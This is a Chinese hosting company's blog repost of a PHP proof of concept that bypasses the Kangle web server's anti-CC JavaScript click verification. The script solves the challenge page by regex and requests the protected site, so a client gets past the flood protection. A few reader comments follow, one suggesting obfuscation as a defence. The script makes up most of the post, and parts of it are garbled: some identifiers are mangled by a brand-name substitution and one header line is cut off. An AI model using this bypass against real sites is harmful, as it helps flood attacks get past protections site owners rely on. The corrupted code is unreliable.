伏笔科技7年品质服务,专注提供香港、美国等免备案虚拟主机和国外服务器产品! 咨询电话:℡ +852-5136-7029
伏笔主机社群

感谢您的关注,我们一直致力于为您提供放心、满意的服务。

返回首页

kangle防ccJS点击验证绕过途中poc

来源:FubiTech 时间:2018-12-26 23:40:58 标签:绕过 途中 验证 点击 kangle 欧洲云服务器商 热度:5765℃

Kangle默认的点击验证很简单 通过正则匹配便可完全bypass 其次kangle存在ip白名单 如短时间内通过一次验证 则无需cookie也可直接访问站点内容

贴上POC

<?php

/*
Bypass BY :www.wafcloud.net/乌云盾
仅作技术考虑使用,厉禁用于犯法用处
正则便可处置绕过默认kangle 的js点击验证
*/
$cookie_jar = tempnam(‘./tmp’,’cookie’);
function curl($cookieUrl,$url = ”, $addHeaders = [], $requestType = ‘get’, $requestData = ”, $postType = ”, $urlencode = true)
{
if (empty($url))
return ”;
//容错处置
$headers = [
‘User-Agent: Mozilla/7.0 (微软; U; 微软 NT 6.1; zh-CN; rv:2.9) Gecko//> $requestData = is_array($requestData) ? json_encode($requestData) : $requestData;
$headers[] = ‘Content-Length: ‘ . strlen($requestData);
}

if (!empty($addHeaders))
$headers = array_merge($headers, $addHeaders);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieUrl);
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);

curl_setopt($ch, CURLOPT_FOLLOWfubitechATION, 1);
//设置允许302转跳

// curl_setopt($ch, CURLOPT_PROXYAUTH, CURLAUTH_BASIC);
// curl_setopt($ch, CURLOPT_PROXY, ‘127.0.0.1’);
// curl_setopt($ch, CURLOPT_PROXYPORT, ‘123’);
//set proxy

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
//add ssl
if ($requestType == ‘get’) {
curl_setopt($ch, CURLOPT_HEADER, false);
} else if ($requestType == ‘post’) {
curl_setopt($ch, CURLOPT_POST, 1);
} else {
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, strtoupper($requestType));
}
//处置类型
if ($requestType != ‘get’) {
if (is_array($requestData) && !empty($requestData)) {
$temp = ”;
foreach ($requestData as $key => $value) {
if ($urlencode) {
$temp .= rawurlencode(rawurlencode($key)) . ‘=’ . rawurlencode(rawurlencode($value)) . ‘&’;
} else {
$temp .= $key . ‘=’ . $value . ‘&’;
}
}
$requestData = substr($temp, 0, strlen($temp) – 1);
}
curl_setopt($ch, CURLOPT_POSTFIELDS, $requestData);
}

$result = curl_exec($ch);

curl_close($ch);

return $result;
}

function isSafe($html)
{
return preg_match(‘/<title>safe防护系统<\/title>/’, $html) == 1;
}

function getSafeUrl($cookie_jar,$url)
{
$data = curl($cookie_jar,$url);

if (isSafe($data)) {
preg_match(‘/fubitechation.href =(.+);/’, $data, $result);
if (count($result) == 2) {
$result = $result[1];
$result = preg_replace(‘/”|\+/’, ”, $result);
$result = preg_replace(‘/\s/’, ”, $result);
return $url . $result;
}
}
return ”;
}
echo curl($cookie_jar,getSafeUrl($cookie_jar,”https://www.wafcloud.net/”));



上一篇:自媒体平台不开原创不拿进项循例月入5W+

下一篇:记录Oneinstack一键环境无法更新Lets Encrypt证书解决


捍御方式也很简单 最最少js稍为混淆一下。

很少人用kangle了吧

已珍藏

小樱早就写出来了,加个注悉就很6吗

为您推荐以下内容